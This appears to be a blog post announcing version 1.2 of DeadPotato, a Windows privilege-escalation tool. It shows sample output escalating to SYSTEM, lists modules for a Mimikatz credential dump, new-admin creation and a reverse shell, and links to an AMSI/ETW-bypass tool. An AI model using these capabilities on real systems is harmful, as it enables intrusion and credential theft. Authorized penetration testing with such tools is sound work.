Cyber security

DeadPotato – Harnessing Advanced System Tools For Security And Administration

The latest iteration of the versatile security tool designed for network administrators and cybersecurity professionals.

This version adds new capabilities like domain data collection for BloodHound and enhanced compatibility with Windows 10.

Learn how to leverage DeadPotato’s suite of modules for system assessment and security exploitation.

This version includes the following changes:

  • sharphound: Attempts to collect domain data for BloodHound. (NOTE: This will write SharpHound to disk!)
  • mimi <sam/lsa/secrets>: Added LSA & Secrets dump with Mimikatz.
  • Added banner compatibility for win10.

Usage of this program in an unauthorized context is strictly forbidden. The author(s) take no responsibility over the misuse of this DeadPotato or any of it’s components.

Choose among many modules! (-cmd, -newadmin, -rev, -exe, ...).
Here is an example with the -sharphound module!

C:\Users\lypd0> DeadPotato.exe -sharphound
      _.--,_
   .-'      '-.          _           _ 
  /            \        | \ _  _  _||_) _ _|_ _ _|_ _ 
 '          _.  '       |_/(/_(_|(_||  (_) |_(_| |_(_)
 \      """" /  ~(      Open Source @ github.com/lypd0
  '=,,_ =\__ `  &             -= Version: 1.2 =-
        ""  ""'; \\\ 


_,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,__,.-'~'-.,_

(*) Attempting to write XaOAZsTO.exe (SharpHound) in the current directory...
(+) File written. Attempting to run enumeration...

(*) Initiating procedure as NT AUTHORITY\NETWORK SERVICE
(+) Is impersonation possible in current context? YES
(+) Currently running as user: NT AUTHORITY\SYSTEM
(+) Elevated process started with PID 3640

-={          OUTPUT BELOW         }=-

<..SNIP..>
2024-08-04T08:08:05.4023630-07:00|INFORMATION|SharpHound Enumeration Completed at 8:08 AM on 8/4/2024! Happy Graphing!

(+) Removing SharpHound and exiting.
BinaryMD5 Checksum
DeadPotato-NET4.exeC76954078004EDD81B1836A09F9D0D66
mimikatz.exe (embedded)E930B05EFE23891D19BC354A4209BE3E
[SharpHound.exe]AAF1146EC9C633C4C3FBE8091F1596D8

For more information click here.

Varshini

Tamil has a great interest in the fields of Cyber Security, OSINT, and CTF projects. Currently, he is deeply involved in researching and publishing various security tools with Kali Linux Tutorials, which is quite fascinating.

Recent Posts

Kali Linux 2024.4 Released, What’s New?

Kali Linux 2024.4, the final release of 2024, brings a wide range of updates and…

4 hours ago

Lifetime-Amsi-EtwPatch : Disabling PowerShell’s AMSI And ETW Protections

This Go program applies a lifetime patch to PowerShell to disable ETW (Event Tracing for…

4 hours ago

GPOHunter – Active Directory Group Policy Security Analyzer

GPOHunter is a comprehensive tool designed to analyze and identify security misconfigurations in Active Directory…

2 days ago

2024 MITRE ATT&CK Evaluation Results – Cynet Became a Leader With 100% Detection & Protection

Across small-to-medium enterprises (SMEs) and managed service providers (MSPs), the top priority for cybersecurity leaders…

5 days ago

SecHub : Streamlining Security Across Software Development Lifecycles

The free and open-source security platform SecHub, provides a central API to test software with…

1 week ago

Hawker : The Comprehensive OSINT Toolkit For Cybersecurity Professionals

Don't worry if there are any bugs in the tool, we will try to fix…

1 week ago